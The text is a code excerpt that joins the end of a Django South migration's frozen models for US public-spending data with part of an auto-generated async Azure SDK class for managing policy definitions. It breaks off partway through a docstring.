'industry_code': ('django.db.models.fields.IntegerField', [], {}),
'state': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'value': ('django.db.models.fields.IntegerField', [], {}),
'year': ('django.db.models.fields.IntegerField', [], {})
},
'data.statepostalcodes': {
'Meta': {'object_name': 'StatePostalCodes'},
'code': ('django.db.models.fields.CharField', [], {'max_length': '2'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'state': ('django.db.models.fields.CharField', [], {'max_length': '32'})
},
'data.staterenewableenergy': {
'Meta': {'object_name': 'StateRenewableEnergy'},
'fossil_coal': ('django.db.models.fields.FloatField', [], {}),
'fossil_gas': ('django.db.models.fields.FloatField', [], {}),
'fossil_oil': ('django.db.models.fields.FloatField', [], {}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'nuclear_electric': ('django.db.models.fields.FloatField', [], {}),
'renewable_biofuels': ('django.db.models.fields.FloatField', [], {}),
'renewable_other': ('django.db.models.fields.FloatField', [], {}),
'renewable_total': ('django.db.models.fields.FloatField', [], {}),
'state': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'total': ('django.db.models.fields.FloatField', [], {}),
'year': ('django.db.models.fields.IntegerField', [], {})
},
'data.subfunctionscffr': {
'Meta': {'object_name': 'SubfunctionsCffr'},
'at_code_1': ('django.db.models.fields.TextField', [], {'max_length': '1', 'null': 'True'}),
'at_code_2': ('django.db.models.fields.TextField', [], {'max_length': '1', 'null': 'True'}),
'at_code_3': ('django.db.models.fields.TextField', [], {'max_length': '1', 'null': 'True'}),
'at_code_4': ('django.db.models.fields.TextField', [], {'max_length': '1', 'null': 'True'}),
'at_code_5': ('django.db.models.fields.TextField', [], {'max_length': '1', 'null': 'True'}),
'at_code_6': ('django.db.models.fields.TextField', [], {'max_length': '1', 'null': 'True'}),
'at_code_7': ('django.db.models.fields.TextField', [], {'max_length': '1', 'null': 'True'}),
'at_code_8': ('django.db.models.fields.TextField', [], {'max_length': '1', 'null': 'True'}),
'cfda_program_code': ('django.db.models.fields.TextField', [], {'max_length': '8'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'program_name': ('django.db.models.fields.TextField', [], {'max_length': '64'}),
'subfunction_name': ('django.db.models.fields.TextField', [], {'max_length': '64'}),
'subfunction_number': ('django.db.models.fields.TextField', [], {'max_length': '3'})
},
'data.summerlunchparticipationstate': {
'Meta': {'unique_together': "(('year', 'state'),)", 'object_name': 'SummerLunchParticipationState'},
'create_date': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'state': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['data.State']"}),
'update_date': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'value': ('django.db.models.fields.IntegerField', [], {}),
'year': ('django.db.models.fields.IntegerField', [], {})
},
'data.summerlunchparticipationstateraw': {
'Meta': {'object_name': 'SummerLunchParticipationStateRaw'},
'create_date': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'state': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'update_date': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'value': ('django.db.models.fields.IntegerField', [], {}),
'year': ('django.db.models.fields.IntegerField', [], {})
},
'data.tanffamilystateraw': {
'Meta': {'object_name': 'TanfFamilyStateRaw'},
'create_date': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'state': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'update_date': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'value': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'year': ('django.db.models.fields.IntegerField', [], {})
},
'data.tanfparticipationstate': {
'Meta': {'unique_together': "(('year', 'state'),)", 'object_name': 'TanfParticipationState'},
'create_date': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'family': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'person': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'state': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['data.State']"}),
'update_date': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'year': ('django.db.models.fields.IntegerField', [], {})
},
'data.tanfparticipationstateraw': {
'Meta': {'object_name': 'TanfParticipationStateRaw'},
'create_date': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'state': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'update_date': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'value': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'year': ('django.db.models.fields.IntegerField', [], {})
},
'data.titleifunding': {
'Meta': {'object_name': 'TitleIFunding'},
'agency_id': ('django.db.models.fields.CharField', [], {'max_length': '7'}),
'agency_name': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'amount': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'state': ('django.db.models.fields.CharField', [], {'max_length': '2'}),
'year': ('django.db.models.fields.IntegerField', [], {})
},
'data.totalstudents': {
'Meta': {'object_name': 'TotalStudents'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'state': ('django.db.models.fields.CharField', [], {'max_length': '2'}),
'value': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'year': ('django.db.models.fields.IntegerField', [], {})
},
'data.usaspendingassistanceraw': {
'Meta': {'object_name': 'UsaspendingAssistanceRaw'},
'agency_code': ('django.db.models.fields.CharField', [], {'max_length': '10'}),
'agency_name': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'assistance_type': ('django.db.models.fields.CharField', [], {'max_length': '5'}),
'assistance_type_name': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'asst_cat_type': ('django.db.models.fields.CharField', [], {'max_length': '1'}),
'cfda_program_num': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'cfda_program_title': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'create_date': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'face_loan_guran': ('django.db.models.fields.BigIntegerField', [], {}),
'fed_funding_amount': ('django.db.models.fields.BigIntegerField', [], {}),
'fiscal_year': ('django.db.models.fields.IntegerField', [], {}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'non_fed_funding_amount': ('django.db.models.fields.BigIntegerField', [], {}),
'orig_sub_guran': ('django.db.models.fields.BigIntegerField', [], {}),
'recip_cat_type': ('django.db.models.fields.CharField', [], {'max_length': '1'}),
'recip_cat_type_name': ('django.db.models.fields.CharField', [], {'max_length': '50'}),
'recipient_country_code': ('django.db.models.fields.CharField', [], {'max_length': '10'}),
'recipient_county_code': ('django.db.models.fields.CharField', [], {'max_length': '10', 'null': 'True'}),
'recipient_state_code': ('django.db.models.fields.CharField', [], {'max_length': '10', 'null': 'True'}),
'total_funding_amount': ('django.db.models.fields.BigIntegerField', [], {}),
'update_date': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'})
},
'data.vehicleregistrations': {
'Meta': {'object_name': 'VehicleRegistrations'},
'all_private': ('django.db.models.fields.IntegerField', [], {}),
'all_public': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'all_total': ('django.db.models.fields.IntegerField', [], {}),
'auto_private': ('django.db.models.fields.IntegerField', [], {}),
'auto_public': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'auto_total': ('django.db.models.fields.IntegerField', [], {}),
'buses_private': ('django.db.models.fields.IntegerField', [], {}),
'buses_public': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'buses_total': ('django.db.models.fields.IntegerField', [], {}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'motorcycle_private': ('django.db.models.fields.IntegerField', [], {}),
'motorcycle_public': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'private_commercial_per_capita': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'state': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'trucks_private': ('django.db.models.fields.IntegerField', [], {}),
'trucks_public': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'trucks_total': ('django.db.models.fields.IntegerField', [], {}),
'year': ('django.db.models.fields.IntegerField', [], {})
},
'data.vocationaledspending': {
'Meta': {'object_name': 'VocationalEdSpending'},
'agency_id': ('django.db.models.fields.CharField', [], {'max_length': '7'}),
'agency_name': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'amount': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'state': ('django.db.models.fields.CharField', [], {'max_length': '2'}),
'year': ('django.db.models.fields.IntegerField', [], {})
},
'data.wicbenefitsstate': {
'Meta': {'unique_together': "(('year', 'state'),)", 'object_name': 'WicBenefitsState'},
'amount': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'create_date': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'state': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['data.State']"}),
'update_date': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'year': ('django.db.models.fields.IntegerField', [], {})
},
'data.wicbenefitsstateraw': {
'Meta': {'object_name': 'WicBenefitsStateRaw'},
'create_date': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'place': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'state': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'type': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'update_date': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'value': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'year': ('django.db.models.fields.IntegerField', [], {})
},
'data.wicparticipationstate': {
'Meta': {'unique_together': "(('year', 'state'),)", 'object_name': 'WicParticipationState'},
'create_date': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'state': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['data.State']"}),
'update_date': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'value': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'year': ('django.db.models.fields.IntegerField', [], {})
},
'data.wicparticipationstateraw': {
'Meta': {'object_name': 'WicParticipationStateRaw'},
'create_date': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'place': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'state': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'type': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'update_date': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'value': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'year': ('django.db.models.fields.IntegerField', [], {})
}
}
complete_apps = ['data']
|
npp/npp-api
|
data/migrations/0032_auto__add_unique_cfda_program_number.py
|
Python
|
mit
| 165,019
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
import functools
from typing import Any, AsyncIterable, Callable, Dict, Generic, Optional, TypeVar
import warnings
from azure.core.async_paging import AsyncItemPaged, AsyncList
from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import AsyncHttpResponse
from azure.core.rest import HttpRequest
from azure.core.tracing.decorator import distributed_trace
from azure.core.tracing.decorator_async import distributed_trace_async
from azure.mgmt.core.exceptions import ARMErrorFormat
from ... import models as _models
from ..._vendor import _convert_request
from ...operations._policy_definitions_operations import build_create_or_update_at_management_group_request, build_create_or_update_request, build_delete_at_management_group_request, build_delete_request, build_get_at_management_group_request, build_get_built_in_request, build_get_request, build_list_built_in_request, build_list_by_management_group_request, build_list_request
T = TypeVar('T')
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, AsyncHttpResponse], T, Dict[str, Any]], Any]]
class PolicyDefinitionsOperations:
"""PolicyDefinitionsOperations async operations.
You should not instantiate this class directly. Instead, you should create a Client instance that
instantiates it for you and attaches it as an attribute.
:ivar models: Alias to model classes used in this operation group.
:type models: ~azure.mgmt.resource.policy.v2021_06_01.models
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
"""
models = _models
def __init__(self, client, config, serializer, deserializer) -> None:
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self._config = config
@distributed_trace_async
async def create_or_update(
self,
policy_definition_name: str,
parameters: "_models.PolicyDefinition",
**kwargs: Any
) -> "_models.PolicyDefinition":
"""Creates or updates a policy definition in a subscription.
This operation creates or updates a policy definition in the given subscription with the given
name.
:param policy_definition_name: The name of the policy definition to create.
:type policy_definition_name: str
:param parameters: The policy definition properties.
:type parameters: ~azure.mgmt.resource.policy.v2021_06_01.models.PolicyDefinition
:keyword callable cls: A custom type or function that will be passed the direct response
:return: PolicyDefinition, or the result of cls(response)
:rtype: ~azure.mgmt.resource.policy.v2021_06_01.models.PolicyDefinition
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.PolicyDefinition"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
content_type = kwargs.pop('content_type', "application/json") # type: Optional[str]
_json = self._serialize.body(parameters, 'PolicyDefinition')
request = build_create_or_update_request(
policy_definition_name=policy_definition_name,
subscription_id=self._config.subscription_id,
content_type=content_type,
json=_json,
template_url=self.create_or_update.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [201]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = self._deserialize('PolicyDefinition', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
create_or_update.metadata = {'url': '/subscriptions/{subscriptionId}/providers/Microsoft.Authorization/policyDefinitions/{policyDefinitionName}'} # type: ignore
@distributed_trace_async
async def delete(
self,
policy_definition_name: str,
**kwargs: Any
) -> None:
"""Deletes a policy definition in a subscription.
This operation deletes the policy definition in the given subscription with the given name.
:param policy_definition_name: The name of the policy definition to delete.
:type policy_definition_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: None, or the result of cls(response)
:rtype: None
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
request = build_delete_request(
policy_definition_name=policy_definition_name,
subscription_id=self._config.subscription_id,
template_url=self.delete.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 204]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
if cls:
return cls(pipeline_response, None, {})
delete.metadata = {'url': '/subscriptions/{subscriptionId}/providers/Microsoft.Authorization/policyDefinitions/{policyDefinitionName}'} # type: ignore
@distributed_trace_async
async def get(
self,
policy_definition_name: str,
**kwargs: Any
) -> "_models.PolicyDefinition":
"""Retrieves a policy definition in a subscription.
This operation retrieves the policy definition in the given subscription with the given name.
:param policy_definition_name: The name of the policy definition to get.
:type policy_definition_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: PolicyDefinition, or the result of cls(response)
:rtype: ~azure.mgmt.resource.policy.v2021_06_01.models.PolicyDefinition
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.PolicyDefinition"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
request = build_get_request(
policy_definition_name=policy_definition_name,
subscription_id=self._config.subscription_id,
template_url=self.get.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = self._deserialize('PolicyDefinition', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get.metadata = {'url': '/subscriptions/{subscriptionId}/providers/Microsoft.Authorization/policyDefinitions/{policyDefinitionName}'} # type: ignore
@distributed_trace_async
async def get_built_in(
self,
policy_definition_name: str,
**kwargs: Any
) -> "_models.PolicyDefinition":
"""Retrieves a built-in policy definition.
This operation retrieves the built-in policy definition with the given name.
:param policy_definition_name: The name of the built-in policy definition to get.
:type policy_definition_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: PolicyDefinition, or the result of cls(response)
:rtype: ~azure.mgmt.resource.policy.v2021_06_01.models.PolicyDefinition
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.PolicyDefinition"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
request = build_get_built_in_request(
policy_definition_name=policy_definition_name,
template_url=self.get_built_in.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = self._deserialize('PolicyDefinition', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get_built_in.metadata = {'url': '/providers/Microsoft.Authorization/policyDefinitions/{policyDefinitionName}'} # type: ignore
@distributed_trace_async
async def create_or_update_at_management_group(
self,
policy_definition_name: str,
management_group_id: str,
parameters: "_models.PolicyDefinition",
**kwargs: Any
) -> "_models.PolicyDefinition":
"""Creates or updates a policy definition in a management group.
This operation creates or updates a policy definition in the given management group with the
given name.
:param policy_definition_name: The name of the policy definition to create.
:type policy_definition_name: str
:param management_group_id: The ID of the management group.
:type management_group_id: str
:param parameters: The policy definition properties.
:type parameters: ~azure.mgmt.resource.policy.v2021_06_01.models.PolicyDefinition
:keyword callable cls: A custom type or function that will be passed the direct response
:return: PolicyDefinition, or the result of cls(response)
:rtype: ~azure.mgmt.resource.policy.v2021_06_01.models.PolicyDefinition
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.PolicyDefinition"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
content_type = kwargs.pop('content_type', "application/json") # type: Optional[str]
_json = self._serialize.body(parameters, 'PolicyDefinition')
request = build_create_or_update_at_management_group_request(
policy_definition_name=policy_definition_name,
management_group_id=management_group_id,
content_type=content_type,
json=_json,
template_url=self.create_or_update_at_management_group.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [201]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = self._deserialize('PolicyDefinition', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
create_or_update_at_management_group.metadata = {'url': '/providers/Microsoft.Management/managementGroups/{managementGroupId}/providers/Microsoft.Authorization/policyDefinitions/{policyDefinitionName}'} # type: ignore
@distributed_trace_async
async def delete_at_management_group(
self,
policy_definition_name: str,
management_group_id: str,
**kwargs: Any
) -> None:
"""Deletes a policy definition in a management group.
This operation deletes the policy definition in the given management group with the given name.
:param policy_definition_name: The name of the policy definition to delete.
:type policy_definition_name: str
:param management_group_id: The ID of the management group.
:type management_group_id: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: None, or the result of cls(response)
:rtype: None
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
request = build_delete_at_management_group_request(
policy_definition_name=policy_definition_name,
management_group_id=management_group_id,
template_url=self.delete_at_management_group.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 204]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
if cls:
return cls(pipeline_response, None, {})
delete_at_management_group.metadata = {'url': '/providers/Microsoft.Management/managementGroups/{managementGroupId}/providers/Microsoft.Authorization/policyDefinitions/{policyDefinitionName}'} # type: ignore
@distributed_trace_async
async def get_at_management_group(
self,
policy_definition_name: str,
management_group_id: str,
**kwargs: Any
) -> "_models.PolicyDefinition":
"""Retrieve a policy definition in a management group.
This operation retrieves the policy definition in the given management group with the given
name.
:param policy_definition_name: The name of the policy definition to get.
:type policy_definition_name: str
:param management_group_id: The ID of the management group.
:type management_group_id: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: PolicyDefinition, or the result of cls(response)
:rtype: ~azure.mgmt.resource.policy.v2021_06_01.models.PolicyDefinition
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.PolicyDefinition"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
request = build_get_at_management_group_request(
policy_definition_name=policy_definition_name,
management_group_id=management_group_id,
template_url=self.get_at_management_group.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = self._deserialize('PolicyDefinition', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get_at_management_group.metadata = {'url': '/providers/Microsoft.Management/managementGroups/{managementGroupId}/providers/Microsoft.Authorization/policyDefinitions/{policyDefinitionName}'} # type: ignore
@distributed_trace
def list(
self,
filter: Optional[str] = None,
top: Optional[int] = None,
**kwargs: Any
) -> AsyncIterable["_models.PolicyDefinitionListResult"]:
"""Retrieves policy definitions in a subscription.
This operation retrieves a list of all the policy definitions in a given subscription that
match the optional given $filter. Valid values for $filter are: 'atExactScope()', 'policyType
-eq {value}' or 'category eq '{value}''. If $filter is not provided, the unfiltered list
includes all policy definitions associated with the subscription, including those that apply
directly or from management groups that contain the given subscription. If
$filter=atExactScope() is provided, the returned list only includes all policy definitions that
at the given subscription. If $filter='policyType -eq {value}' is provided, the returned list
only includes all policy definitions whose type match the {value}. Possible policyType values
are NotSpecified, BuiltIn, Custom, and Static. If $filter='category -eq {value}' is provided,
the returned list only includes all policy definitions whose category match the {value}.
:param filter: The filter to apply on the operation. Valid values for $filter are:
'atExactScope()', 'policyType -eq {value}' or 'category eq '{value}''. If $filter is not
provided, no filtering is performed. If $filter=atExactScope() is provided, the returned list
only includes all policy definitions that at the given scope. If $filter='policyType -eq
{value}' is provided, the returned list only includes all policy definitions whose type match
the {value}. Possible policyType values are NotSpecified, BuiltIn, Custom, and Static. If
$filter='category -eq {value}' is provided, the returned list only includes all policy
definitions whose category match the {value}.
:type filter: str
:param top: Maximum number of records to return. When the $top filter is not provided, it will
return 500 records.
:type top: int
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either PolicyDefinitionListResult or the result of
cls(response)
:rtype:
~azure.core.async_paging.AsyncItemPaged[~azure.mgmt.resource.policy.v2021_06_01.models.PolicyDefinitionListResult]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.PolicyDefinitionListResult"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
def prepare_request(next_link=None):
if not next_link:
request = build_list_request(
subscription_id=self._config.subscription_id,
filter=filter,
top=top,
template_url=self.list.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
else:
request = build_list_request(
subscription_id=self._config.subscription_id,
filter=filter,
top=top,
template_url=next_link,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
request.method = "GET"
return request
async def extract_data(pipeline_response):
deserialized = self._deserialize("PolicyDefinitionListResult", pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, AsyncList(list_of_elem)
async def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
return pipeline_response
return AsyncItemPaged(
get_next, extract_data
)
list.metadata = {'url': '/subscriptions/{subscriptionId}/providers/Microsoft.Authorization/policyDefinitions'} # type: ignore
@distributed_trace
def list_built_in(
self,
filter: Optional[str] = None,
top: Optional[int] = None,
**kwargs: Any
) -> AsyncIterable["_models.PolicyDefinitionListResult"]:
"""Retrieve built-in policy definitions.
This operation retrieves a list of all the built-in policy definitions that match the optional
given $filter. If $filter='policyType -eq {value}' is provided, the returned list only includes
all built-in policy definitions whose type match the {value}. Possible policyType values are
NotSpecified, BuiltIn, Custom, and Static. If $filter='category -eq {value}' is provided, the
returned list only includes all built-in policy definitions whose category match the {value}.
:param filter: The filter to apply on the operation. Valid values for $filter are:
'atExactScope()', 'policyType -eq {value}' or 'category eq '{value}''. If $filter is not
provided, no filtering is performed. If $filter=atExactScope() is provided, the returned list
only includes all policy definitions that at the given scope. If $filter='policyType -eq
{value}' is provided, the returned list only includes all policy definitions whose type match
the {value}. Possible policyType values are NotSpecified, BuiltIn, Custom, and Static. If
$filter='category -eq {value}' is provided, the returned list only includes all policy
definitions whose category match the {value}.
:type filter: str
:param top: Maximum number of records to return. When the $top filter is not provided, it will
return 500 records.
:type top: int
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either PolicyDefinitionListResult or the result of
cls(response)
:rtype:
~azure.core.async_paging.AsyncItemPaged[~azure.mgmt.resource.policy.v2021_06_01.models.PolicyDefinitionListResult]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.PolicyDefinitionListResult"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
def prepare_request(next_link=None):
if not next_link:
request = build_list_built_in_request(
filter=filter,
top=top,
template_url=self.list_built_in.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
else:
request = build_list_built_in_request(
filter=filter,
top=top,
template_url=next_link,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
request.method = "GET"
return request
async def extract_data(pipeline_response):
deserialized = self._deserialize("PolicyDefinitionListResult", pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, AsyncList(list_of_elem)
async def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
return pipeline_response
return AsyncItemPaged(
get_next, extract_data
)
list_built_in.metadata = {'url': '/providers/Microsoft.Authorization/policyDefinitions'} # type: ignore
@distributed_trace
def list_by_management_group(
self,
management_group_id: str,
filter: Optional[str] = None,
top: Optional[int] = None,
**kwargs: Any
) -> AsyncIterable["_models.PolicyDefinitionListResult"]:
"""Retrieve policy definitions in a management group.
This operation retrieves a list of all the policy definitions in a given management group that
match the optional given $filter. Valid values for $filter are: 'atExactScope()', 'policyType
-eq {value}' or 'category eq '{value}''. If $filter is not provided, the unfiltered list
includes all policy definitions associated with the management group, including those that
